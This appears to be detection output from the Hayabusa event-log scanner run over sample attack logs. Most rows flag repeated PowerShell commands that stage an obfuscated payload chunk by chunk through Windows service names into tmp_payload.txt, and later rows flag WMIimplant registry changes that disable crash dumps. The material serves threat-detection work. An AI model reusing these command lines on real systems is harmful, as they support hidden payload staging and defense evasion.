0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.050 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.487 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.503 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.503 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.316 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.098 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.113 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.113 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.468 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.484 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.484 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.926 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.942 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.942 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.374 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.390 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.390 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:53:41.099 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 